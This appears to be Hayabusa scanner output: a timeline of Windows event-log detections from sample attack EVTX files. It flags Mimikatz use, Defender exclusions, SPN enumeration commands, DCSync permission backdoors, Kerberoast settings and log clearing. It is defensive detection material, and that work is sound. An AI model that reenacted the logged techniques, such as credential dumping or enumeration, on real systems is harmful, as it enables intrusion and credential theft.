C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx -2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx -2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx -2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx -2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:44:51.331 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2020-12-16 17:45:04.144 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx -2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd : Path: C:\Windows\SysWOW64\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: powershell.exe start-process notepad.exe : Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\SysWOW64\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: powershell.exe start-process notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx -2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: setspn -T offsec -Q */* : Path: C:\Windows\System32\setspn.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx -2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,Possible SPN Enumeration,,rules/sigma/process_creation/win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx -2021-02-03 00:37:59.991 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-03 00:37:59.993 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-03 00:38:31.989 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-03 00:38:31.995 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx -2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx -2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx -2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx -2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx -2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx -2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx -2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx -2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,informational,Bits Job Creation,Job Title: hackingarticles : URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx -2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: ab170ec9.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: efc1a28b.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe : URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe : URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx -2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx -2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx -2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows 